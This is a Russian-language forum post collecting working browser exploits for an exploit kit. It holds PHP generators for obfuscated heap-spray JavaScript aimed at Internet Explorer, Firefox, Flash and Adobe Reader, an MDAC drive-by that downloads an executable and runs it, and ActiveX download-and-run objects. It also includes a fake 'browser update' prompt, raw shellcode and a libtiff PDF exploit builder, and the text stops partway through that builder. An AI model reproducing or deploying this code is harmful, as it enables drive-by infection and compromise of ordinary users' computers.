Предлогаю выкладывать сдесь актуальные сплойты которые можно воткнуть в связку. Начну пожалуй: IE 7 PHP: function mem_cor() { $memcor_name = get_random_string_array(rand(8,15), '15'); $content = ' var '. $memcor_name[0] .' = unescape('._shellcode(mem_cor).'); var '. $memcor_name[1] .' = new Array(); var '. $memcor_name[2] .' = 0x100000-('. $memcor_name[0] .'.length*2+0x01020); var '. $memcor_name[4] .' = unescape("%u0C0C%u0C0C"); while('. $memcor_name[4] .'.length<'. $memcor_name[2] .'/2) { '. $memcor_name[4] .'+='. $memcor_name[4] .';} var '. $memcor_name[3] .' = '. $memcor_name[4] .'.substring(0,'. $memcor_name[2] .'/2); delete '. $memcor_name[4] .'; for('. $memcor_name[5] .'=0; '. $memcor_name[5] .'<0xC0; '. $memcor_name[5] .'++) { '. $memcor_name[1] .'['. $memcor_name[5] .'] = '. $memcor_name[3] .' + '. $memcor_name[0] .'; } CollectGarbage(); var '. $memcor_name[6] .'=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var '. $memcor_name[7] .' = new Array(); for(var '. $memcor_name[11] .'=0;'. $memcor_name[11] .'<1000;'. $memcor_name[11] .'++) '. $memcor_name[7] .'.push(document.createElement("img")); function '. $memcor_name[10] .'() { '. $memcor_name[8] .'=document.createElement("tbody"); '. $memcor_name[8] .'.click; var '. $memcor_name[9] .' = '. $memcor_name[8] .'.cloneNode(); '. $memcor_name[8] .'.clearAttributes(); '. $memcor_name[8] .'=null; CollectGarbage(); for(var '. $memcor_name[11] .'=0;'. $memcor_name[11] .'<'. $memcor_name[7] .'.length;'. $memcor_name[11] .'++) '. $memcor_name[7] .'['. $memcor_name[11] .'].src='. $memcor_name[6] .'; '. $memcor_name[9] .'.click; } window.setTimeout("'. $memcor_name[10] .'();",500); '; return $content; } Mdac IE 6 PHP: function mdac() // ie 6 ... {global $url; $mdac_name = get_random_string_array(rand(8,19), '15'); $content = ' var '. $mdac_name[0] .'=\''.$url.'?spl=mdac\'; function '. $mdac_name[1] .'('. $mdac_name[7] .','. $mdac_name[8] .'){ var '. $mdac_name[2] .'=null; try{'. $mdac_name[2] .'='. 
$mdac_name[7] .'.CreateObject('. $mdac_name[8] .')}catch(e){} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.CreateObject('. $mdac_name[8] .',"")}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.CreateObject('. $mdac_name[8] .',"","")}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.GetObject("",'. $mdac_name[8] .')}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.GetObject('. $mdac_name[8] .',"")}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.GetObject('. $mdac_name[8] .')}catch(e){}} return('. $mdac_name[2] .'); } function '. $mdac_name[3] .'('. $mdac_name[9] .'){ '. $mdac_name[10] .'="file.exe";var '. $mdac_name[4] .'='. $mdac_name[9] .'.CreateObject("Scripting.FileSystemObject",""); var sap='. $mdac_name[1] .'('. $mdac_name[9] .',"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on"); var '. $mdac_name[11] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"ADODB.Stream"); var '. $mdac_name[5] .'=null;'. $mdac_name[10] .'='. $mdac_name[4] .'.BuildPath('. $mdac_name[4] .'.GetSpecialFolder(2),'. $mdac_name[10] .');'. $mdac_name[11] .'.Mode=3; try{'. $mdac_name[5] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"Mic"+"ro"+"so"+"ft.XM"+"LH"+"T"+"TP");'. $mdac_name[5] .'.open("G"+"ET",'. $mdac_name[0] .',false);} catch(e){try{'. $mdac_name[5] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"MSX"+"M"+"L2.XML"+"HT"+"TP");'. $mdac_name[5] .'.open("GE"+"T",'. $mdac_name[0] .',false);} catch(e){try{'. $mdac_name[5] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"M"+"SX"+"ML2.Se"+"rv"+"erX"+"MLHT"+"TP");'. $mdac_name[5] .'.open("GET",'. $mdac_name[0] .',false);} catch(e) { try { '. $mdac_name[5] .'=new XMLHttpRequest(); '. $mdac_name[5] .'.open("GET",'. $mdac_name[0] .',false); } catch(e){return 0;}}}} '. $mdac_name[11] .'.Type=1;'. $mdac_name[5] .'.send(null);rb='. $mdac_name[5] .'.responseBody;'. $mdac_name[11] .'.Open();'. 
$mdac_name[11] .'.Write(rb);'. $mdac_name[11] .'.SaveTofile('. $mdac_name[10] .',2);sap.ShellExecute('. $mdac_name[10] .'); return 1; } function '. $mdac_name[6] .'(){ var '. $mdac_name[12] .'=0; var '. $mdac_name[6] .'d=new Array(\'BD96C556-65A3-11D0-983A-00C04FC29E36\',\'BD96C556-65A3-11D0-983A-00C04FC29E30\',\'AB9BCEDD-EC7E-47E1-9322-D4A210617116\',\'0006F033-0000-0000-C000-000000000046\',\'0006F03A-0000-0000-C000-000000000046\',\'6e32070a-766d-4ee6-879c-dc1fa91d2fc3\',\'6414512B-B978-451D-A0D8-FCFDF33E833C\',\'7F5B7F63-F06F-4331-8A26-339E03C0AE3D\',\'06723E09-F4C2-43c8-8358-09FCD1DB0766\',\'639F725F-1B2D-4831-A9FD-874847682010\',\'BA018599-1DB3-44f9-83B4-461454C84BF8\',\'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19\',\'E8CCCDDF-CA28-496b-B050-6C07C962476B\',null); while('. $mdac_name[6] .'d['. $mdac_name[12] .']) { var '. $mdac_name[9] .'=null; '. $mdac_name[9] .'=document.createElement("object"); '. $mdac_name[9] .'.setAttribute("classid","clsid:"+'. $mdac_name[6] .'d['. $mdac_name[12] .']); if('. $mdac_name[9] .'){try{var '. $mdac_name[13] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on"); if('. $mdac_name[13] .'){if('. $mdac_name[3] .'('. $mdac_name[9] .'))return 1;}}catch(e){}} '. $mdac_name[12] .'++; } } '. $mdac_name[6] .'(); '; return $content; } Mozilla Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC PHP: function jno() // Mozilla Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC { $jno_name = get_random_string_array(rand(3,19), '15'); $content = ' var '. $jno_name[0] .' = ' . _shellcode(jno) . '; var '. $jno_name[1] .' = unescape('. $jno_name[0] .'); var '. $jno_name[2] .' = unescape(\'%u0800\'); var '. $jno_name[3] .' = 0x08000800; var '. $jno_name[4] .'; var '. $jno_name[5] .'; var '. $jno_name[6] .'; var '. $jno_name[7] .' = \'\' + navigator.userAgent; if ('. $jno_name[7] .'.indexOf(\'Windows\') != -1) { '. $jno_name[4] .' = '. $jno_name[1] .'; '. $jno_name[5] .' = '. $jno_name[3] .'; '. 
$jno_name[6] .' = '. $jno_name[2] .'; } var '. $jno_name[8] .' = '. $jno_name[6] .'; while ('. $jno_name[8] .'.length <= 0x400000) '. $jno_name[8] .'+='. $jno_name[8] .'; var '. $jno_name[9] .' = new Array(); for (var '. $jno_name[10] .' =0; '. $jno_name[10] .'<36; '. $jno_name[10] .'++) { '. $jno_name[9] .'['. $jno_name[10] .'] = '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .' + '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .' + '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .' + '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .'; } if (window.navigator.javaEnabled) { window.navigator = ('. $jno_name[5] .' / 2); try { java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0 ); }catch(e){} } '; return $content; } Mozilla Firefox <= 3.5.0 PHP: [PHP]function font_tags() // Mozilla Firefox <= 3.5.0 просмотреть эксп, проверить на версиях 2.х, 3х { $font_name = get_random_string_array(rand(3,19), '15'); $content = ' <html> <head> <div id="'. $font_name[12] .'"> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> var '. $font_name[0] .' = ' . _shellcode(Font_FireFox) . '; var '. $font_name[1] .' = unescape('. $font_name[0] .'); var '. $font_name[2] .' = unescape("%u0c0c%u0c0c"); while ('. $font_name[2] .'.length<0x60000) { '. $font_name[2] .' += '. $font_name[2] .'; } '. $font_name[3] .' = new Array(); for (i=0; i<600; i++) { '. $font_name[3] .'[i] = '. $font_name[2] .' + '. $font_name[1] .'; } var '. $font_name[4] .' = new Array() function '. $font_name[5] .'('. $font_name[6] .') { var i; var c; var '. $font_name[7] .'=""; for(i=0;i<'. $font_name[6] .'.length;i++) { c='. $font_name[6] .'.charAt(i); if(c=="&" || c=="?" 
|| c=="=" || c=="%" || c==" ") c = escape(c); '. $font_name[7] .'+=c; } return '. $font_name[7] .'; } function '. $font_name[8] .'(){ '. $font_name[4] .' = new Array(); '. $font_name[4] .'[0] = new Array(); '. $font_name[4] .'[0]["str"] = "blah"; var '. $font_name[10] .' = document.getElementById("'. $font_name[12] .'") if (document.getElementsByTagName) { var i=0; '. $font_name[11] .' = '. $font_name[10] .'.getElementsByTagName("p") if ('. $font_name[11] .'.length > 0) while (i<'. $font_name[11] .'.length) { '. $font_name[13] .' = '. $font_name[11] .'[i].getElementsByTagName("font") '. $font_name[4] .'[i+1] = new Array() if ('. $font_name[13] .'[0]) { '. $font_name[4] .'[i+1]["str"] = '. $font_name[13] .'[0].innerHTML; } i++ } } } function '. $font_name[9] .'() { var html = ""; for (i=1;i<'. $font_name[4] .'.length;i++) { html += '. $font_name[5] .'('. $font_name[4] .'[i]["str"]) } } '. $font_name[8] .'(); '. $font_name[9] .'() </script> '; return $content; } FireFox PDF PHP: [PHP]function pdf_ff() { global $pdf; $pdf_ff_name = get_random_string_array(rand(3,19), '5'); $content = ' function '. $pdf_ff_name[0] .'() { var '. $pdf_ff_name[1] .' = false; try {if( navigator.plugins && navigator.mimeTypes.length) {for( var '. $pdf_ff_name[2] .' = 0; '. $pdf_ff_name[2] .' < navigator.plugins.length; '. $pdf_ff_name[2] .'++) {var '. $pdf_ff_name[3] .' = navigator.plugins['. $pdf_ff_name[2] .'].name; if( '. $pdf_ff_name[3] .'.indexOf("Adobe Acrobat") != -1) {'. $pdf_ff_name[1] .' = true;break;}}} }catch(e){} if('. $pdf_ff_name[1] .') { document.write(\'<embed src="'.$pdf.'?spl=pdf_ff" width='.rand(10,499).' height='.rand(10,499).' style="border:none" type="application/pdf"></embed>\'); } else return false; } '. $pdf_ff_name[0] .'(); '; return $content; } Opera PDF PHP: [PHP]function pdf_op() { global $pdf; $pdf_op_name = get_random_string_array(rand(3,19), '5'); $content = ' function '. $pdf_op_name[0] .'() { var '. $pdf_op_name[1] .' 
= false; try { if( navigator.plugins && navigator.mimeTypes.length) {for( var '. $pdf_op_name[2] .' = 0; '. $pdf_op_name[2] .' < navigator.plugins.length; '. $pdf_op_name[2] .'++) {var '. $pdf_op_name[3] .' = navigator.plugins['. $pdf_op_name[2] .'].name; if( '. $pdf_op_name[3] .'.indexOf("Adobe Acrobat") != -1) {'. $pdf_op_name[1] .' = true;break;}}} } catch(e){} if('. $pdf_op_name[1] .') { document.write(\'<embed src="'.$pdf.'?spl=pdf_op" width='.rand(10,499).' height='.rand(10,499).' style="border:none" type="application/pdf"></embed>\'); } else return false; } '. $pdf_op_name[0] .'(); '; return $content; }
IE PDF PHP: [PHP]function pdf_ie() { global $pdf,$case_spl; $pdf_ie_name = get_random_string_array(rand(7,19), '8'); //if ((ver <= "7.1.1") || (ver >= "8.0.0") && (ver <= "8.1.4") || (ver == "9.0.0")) $O000000OO = ' document.write("<OBJECT id=jdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>"); var ver = jdf1.GetVersions(); ver = ver.split(","); ver = ver[1].split("="); ver = ver[1]; if ((ver < "7.1.4") || (ver < "8.1.7") || (ver < "9.2")) { document.write(\'<iframe src="'.$pdf.'" width="'.rand(40, 499).'" height="'.rand(40, 499).'" frameborder="0"></iframe>\'); } else { setTimeout("dorefresh();",1000); } '; return $O000000OO; } function pdf_2() { global $pdf; $O000000OO=' <object height="1" width="1" type="application/pdf" data="'.$pdf.'"> <param name="src" value="1.pdf"> </object> '; return $O000000OO; } PDF ALL PHP: function pdf_all() { global $pdf; $O000000OO = 'document.write("<iframe src=\"'.$pdf.'?spl=pdf_all\" width=\"'.rand(40, 499).'\" height=\"'.rand(40, 499).'\" frameborder=\"0\"></iframe>");'; return $O000000OO; } //=========================================================// PDF //=========================================================// function activex_pack() { global $load,$url; $O000000OO = ' <object classid="clsid:97AF4A45-49BE-4485-9F55-91AB40F288F2"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:97AF4A45-49BE-4485-9F55-91AB40F22B92"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:97AF4A45-49BE-4485-9F55-91AB40F22BF2"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:18A295DA-088E-42D1-BE31-5028D7F9B965"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:3356DB7C-58A7-11D4-AA5C-006097314BF8"> <PARAM NAME="installAppMgr" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10"> 
<PARAM NAME="PerformUpdateAsync" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0"> <PARAM NAME="ExecutePreferredApplication" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"> <PARAM NAME="propWidth" VALUE="0"> <PARAM NAME="propHeight" VALUE="0"> <PARAM NAME="propDownloadUrl" VALUE="'.$load.'?spl=ActiveX_pack"> <PARAM NAME="propPostDownloadAction" VALUE="run"> </OBJECT> <OBJECT id="sysWIN" WIDTH=1 HEIGHT=1 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="'.$url.'/Bol.CAB"> </OBJECT> <script language="vbscript"> sysWIN.url = "'.$load.'?spl=ActiveX_pack" sysWIN.fontsize = 10 sysWIN.barcolor = 00FF00 sysWIN.start = "start" </script> '; return $O000000OO; } function java_exec() { global $load; $url = $load . "?spl=javar"; $url = base64_encode($url); $O000000OO = ' <applet code="ghsdr.Jewredd.class" archive="5734.jar" width="150" height="620"> <param name="data" VALUE="'.$url.'"> <param name="cc" value="1"> </applet> '; return $O000000OO; } function next_spl($refr) { global $O0000000O,$OOOOOO000,$OOOOO0000,$OOOO00000; $O0000000O++; $O000000OO = ' function dorefresh(){ window.location="?spl='.$O0000000O.'&br='.$OOOOOO000.'&vers='.$OOOOO0000[2].'&s='.$OOOO00000.'"; } setTimeout("dorefresh();",'.$refr.'000); '; return $O000000OO; } function flash10() { global $url; $content =' function flash_version(){ var d, n = navigator, m, f = \'Shockwave Flash\'; if((m = n.mimeTypes) && (m = m["application/x-shockwave-flash"]) && m.enabledPlugin && (n = n.plugins) && n[f]) {d = n[f].description} else if (window.ActiveXObject) { try { d = (new ActiveXObject((f+\'.\'+f).replace(/ /g,\'\'))).GetVariable(\'$version\');} catch (e) {}} return d ? 
d.replace(/\D+/,\'\').split(/\D+/) : [0,0]; } function start_flash(){ document.write(\'<object width="50" height="40"><param name="movie" value="done.swf"><embed src="'.$url.'/98757182190.swf" width="550" height="400"></embed></object>\'); var memory; var nop = unescape("%u0c0c%u0c0c"); var SC=unescape('._shellcode("flash").'); while(nop.length <= 0x10000/2) nop+=nop; nop=nop.substring(0,0x10000/2 - SC.length); memory=new Array(); for(i=0;i<0x800;i++){memory[i]=nop + SC;} } var verss = flash_version()[0]+"."+flash_version()[1]+"."+flash_version()[2]; if (flash_version()[0] == "10") { if (flash_version()[2] < "32") { start_flash(); } else { // document.write(\'<iframe src="http://domx0.cn/arend_my/load.php?spl=not" width="0" height="0" frameborder="0"></iframe>\'); } } if (flash_version()[0] == "9") { if (flash_version()[2] < "246") { start_flash(); } } '; return $content; } function soc() { global $soc_pack; $O000000OO = ' <SCRIPT LANGUAGE="javascript"> function fakes() { if (confirm("Warning! Your browser is old. 
\n please install the update")) { parent.location="soc.php"; } else { } } fakes(); </SCRIPT> '; if ($soc_pack =="0"){ $xxx = '';} else $xxx = $O000000OO; return $xxx; } function newie() { $O000000OO = ' function LoaD(){ document.getElementsByTagName(\'STYLE\')[0].outerHTML++; } function HeapSpray(){ var unspacese = unescape; var shellcode = unspacese("%uf527%uf940%u4991%uf59b%uf591%uf593%u3743%u4793%ufd96%u97d6%u4b97%u9046%u4643%u4296%u4f98%u4241%u929f%u4793%u4f41%u47f8%uf89b%u9f4b%u4ff8%u424f%u4099%u484e%u924b%u91fc%uf897%ufc90%u4a4e%ufd43%u9137%ufd9f%uf847%u48fc%u4242%uf599%u4bfd%ud69b%u9b42%u379b%u4092%u4ed6%u374b%u37f5%ufcd6%u4f41%u9291%u3749%u2797%u92d6%u2792%u41f8%u9741%u4048%u4143%u9f4b%u4a9b%u4296%u9b48%u9249%u4648%u9b4a%ufc96%u2ff5%u9b99%u4791%ufc91%ud6f9%u3791%uf527%u9b99%u374f%u969b%u9b4b%u40f8%u9b43%u9149%u4a92%u4891%ud62f%u41d6%u4f98%u4f42%ufc9f%u9090%u4a37%u9290%u4ad6%u9747%ufd49%u914b%u924e%u4f90%u4848%u43fc%u4040%u9941%u2743%u98f8%u3f47%u4892%u964a%ud637%u4a91%u49fc%u932f%uf527%u4646%u4990%u9196%ufc47%ud690%u9298%uf5f8%u91f9%u47f9%u4637%u99fc%u404f%u4048%u9246%u9947%u4e4e%u4a27%u9b96%u4bfc%u3f96%u49f8%u2f4f%u9b4f%ud693%uf84a%u90d6%u4391%ufc3f%u4342%u962f%u404f%u974a%ud69f%uf8f9%u4240%u9798%ufc93%u4947%ufd4b%u4240%u4b97%u4f37%u4e96%u4f96%u962f%u3741%u37f5%u4f42%uf84e%u9190%ufc90%u4e99%ufd4f%ufd9f%u4a47%u4e3f%ufc9b%u2f4b%u9393%ud63f%u4297%ufd93%u3f40%u4747%u9897%ufd46%u9396%u4392%u374b%u4743%ufc37%uf543%uf890%u4af9%u973f%u92f5%u27f9%u9891%u2fd6%ufc46%u4347%u4f91%u40f8%u4b96%u93f8%u9696%u472f%u9646%u3ff5%u9646%u9f43%u4296%u9340%u429b%u91fd%u464a%u49f9%u9b37%u4ad6%u47f9%u9f48%u37fd%u4391%u494f%u914b%ufc4a%u929b%u279f%uf52f%u4699%u96f5%u9f43%u4e27%u9927%u4a93%u922f%u4648%u4e9f%u4793%u4afc%uf837%ufc40%ufd4e%u96fd%u4a98%ufc3f%ufd4f%u4ffc%u3f4e%u92fc%u409b%u9140%u4640%u4697%u4b47%u4f90%u9f49%u2f41%u4190%ud69b%u37fc%u274f%u2f4f%u4f9f%u2f48%u4e40%u3f4a%u4f93%ufd97%u9b4b%u2748%u9999%u4f9f%u9292%u379b%u4f90%u93fc%u4f4b%u2793%u3793%u2f43%uf897%u414e%uf927%u4297%u
f948%uf54b%u4afc%u9748%u2f2f%u9f46%uf94b%u3799%u9946%u4047%u494b%u9ff5%uf996%u492f%u3f93%u2ffc%u489f%u9843%u3f4e%u9848%ufd41%uf94b%u42fd%ud642%u372f%u42f9%ufd4e%u9f41%u4047%u4b2f%u964a%u4f2f%u97fc%u424b%u2740%u9bd6%u9341%u494f%ud6d6%u9147%u49fc%u4b4a%u92f5%uf54b%u4e4f%u3f4f%ufd99%u9bf8%u2797%u2f93%u9197%u2f42%u3f2f%u2742%u9b4e%u42f5%u4143%uf896%u484f%ud647%u272f%u96fc%u9349%u4697%uf597%uf83f%u2f97%u9198%u4193%u429f%u4b48%u4349%u914e%u2fd6%u9b2f%u4f98%u9b93%u4827%u4698%u4a9f%uf54b%u4f47%u9f9b%u924f%u9143%u9642%u91f8%uf549%u9992%u9327%uf8f5%u4691%u91fc%u9237%u46fd%u3f92%ud646%u3f49%u37f9%u4999%u9692%u4a9f%u902f%u929b%u4698%u4f91%u9393%u4342%u4837%u3348%ub1c9%uba34%ubfe7%ub4f5%uc4d9%u74d9%uf424%u315e%u1056%uc683%u0304%u0c56%u4a05%u7074%u479d%u8688%u40e1%u79fe%u9119%uf361%ua0fc%u67b3%u9075%ue303%u19db%ua1ef%uaacf%u6d9d%u1be0%u482b%u9ccf%u549d%u5f83%u28bf%ub3d9%u101f%uc612%u555e%u294e%u0e32%u9805%u3ba3%u215b%uebc5%u19d0%u8ebd%ued26%u9077%u5e76%uda03%ud46e%ufb4b%u398f%uc788%u36c6%ub37b%u9ed9%u3cb5%udee8%u031a%ud2c5%u4363%u0ce1%ubf16%ub012%u0421%u6e69%u99a7%ue5c9%u7a1f%u2ae8%u09f9%u87e6%u568d%u16ea%ued41%u9216%u2264%ue09f%ue642%ub3c4%ubfeb%u12a0%udf13%uca0c%uabb1%u1fbe%uf1c3%uded4%u8c41%ue191%u8f59%u89b1%u0468%ucd5e%ucf74%u311b%uda97%uda51%u8f0e%u87d8%u65b0%ube1e%u8c32%u45de%ue52a%u02db%u15ec%u1b91%u1999%u1b06%u7988%u8fc9%u5050%u286c%uacf2"); var bigblock = unspacese( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); var headersize = 20 + shellcode.length; while (bigblock.length < headersize) bigblock+=bigblock; fillblock = bigblock.substring(0,headersize); block = bigblock.substring(0,bigblock.length-headersize); while(block .length+headersize < 0x90000) block = block +block +fillblock; var memory = new Array(); for (cnt=0;cnt<1000;cnt++) memory[cnt]=block +shellcode; LoaD(); } '; $xxx = ''; return $O000000OO; }
Легендарный PDF libbtiff на данный момент входит во все приват связки эксплойтов!! PHP: <?php //error_reporting(0); include ('shellcode.php'); include ('Includes/ascii85.php'); function Generate_Exploit() { // $Shellcode = Generate_Shellcode(); $Shellcode = RetrieveShellCode_PDF("4"); $Shellcode_Offset = 1500; $Exploit_Offset = 8248; $Exploit = "\x49\x49\x2a\x00"; $Exploit = $Exploit.pack("L", $Exploit_Offset); $Exploit = $Exploit.str_repeat("\x90", $Shellcode_Offset); $Exploit = $Exploit.$Shellcode; $Exploit = $Exploit.str_repeat("\x90", $Exploit_Offset - 8 - strlen($Shellcode) - $Shellcode_Offset); $Exploit = $Exploit."\x07\x00\x00\x01\x03\x00\x01\x00"; $Exploit = $Exploit."\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"; $Exploit = $Exploit."\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"; $Exploit = $Exploit."\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"; $Exploit = $Exploit."\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"; $Exploit = $Exploit."\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"; $Exploit = $Exploit."\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"; $Exploit = $Exploit."\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"; $Exploit = $Exploit."\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"; $Exploit = $Exploit."\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"; $Exploit = $Exploit."\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"; $Exploit = $Exploit."\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = 
$Exploit."\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"; $Exploit = $Exploit."\x00\x07"; $Exploit = base64_encode($Exploit); return $Exploit; } ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// function Generate_XML() { $Exploit = Generate_Exploit(); $XML = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/1.0/\">\r\n<present>\r\n<pdf>\r\n<version>1.65</version>\r\n<interactive>1</interactive>\r\n<linearized>1</linearized>\r\n</pdf>\r\n<xdp>\r\n<packets>*</packets>\r\n</xdp>\r\n<destination>pdf</destination>\r\n</present>\r\n</config>\r\n<template baseProfile=\"interactiveForms\" xmlns=\"http://www.xfa.org/schema/xfa-template/2.4/\">\r\n<subform name=\"topmostSubform\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet>\r\n<pageArea id=\"PageArea1\" name=\"PageArea1\">\r\n<contentArea name=\"ContentArea1\" x=\"0pt\" y=\"0pt\" w=\"612pt\" h=\"792pt\" />\r\n<medium short=\"612pt\" long=\"792pt\" stock=\"custom\" />\r\n</pageArea>\r\n</pageSet>\r\n<subform name=\"Page1\" x=\"0pt\" y=\"0pt\" w=\"612pt\" h=\"792pt\">\r\n<break before=\"pageArea\" 
beforeTarget=\"#PageArea1\" />\r\n<bind match=\"none\" />\r\n<field name=\"ImageField1\" w=\"28.575mm\" h=\"1.39mm\" x=\"37.883mm\" y=\"29.25mm\">\r\n<ui>\r\n<imageEdit />\r\n</ui>\r\n</field>\r\n<?templateDesigner expand 1?>\r\n</subform>\r\n<?templateDesigner expand 1?>\r\n</subform>\r\n<?templateDesigner FormTargetVersion 24?>\r\n<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>\r\n<?templateDesigner Zoom 94?>\r\n</template>\r\n<xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\r\n<xfa:data>\r\n<topmostSubform>\r\n<ImageField1 xfa:contentType=\"image/tif\" href=\"\">".$Exploit."</ImageField1>\r\n</topmostSubform>\r\n</xfa:data>\r\n</xfa:datasets>\r\n<PDFSecurity xmlns=\"http://ns.adobe.com/xtd/\" print=\"1\" printHighQuality=\"1\" change=\"1\" modifyAnnots=\"1\" formFieldFilling=\"1\" documentAssembly=\"1\" contentCopy=\"1\" accessibleContent=\"1\" metadata=\"1\" />\r\n<form checksum=\"a5Mpguasoj4WsTUtgpdudlf4qd4=\" xmlns=\"http://www.xfa.org/schema/xfa-form/2.8/\">\r\n<subform name=\"topmostSubform\">\r\n<instanceManager name=\"_Page1\" />\r\n<subform name=\"Page1\">\r\n<field name=\"ImageField1\" />\r\n</subform>\r\n<pageSet>\r\n<pageArea name=\"PageArea1\" />\r\n</pageSet>\r\n</subform>\r\n</form>\r\n</xdp:xdp>\r\n\r\n"; return $XML; } ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// function Generate_PDF() { $Newline = "\r\n"; $Ascii_85 = new ASCII85(); $XML = gzcompress(Generate_XML()); $XML = $Ascii_85->encode($XML); $PDF = "%PDF-1.6".$Newline; $PDF = $PDF."1 0 obj".$Newline; // $PDF = $PDF."<</Length ".strlen($XML)." 
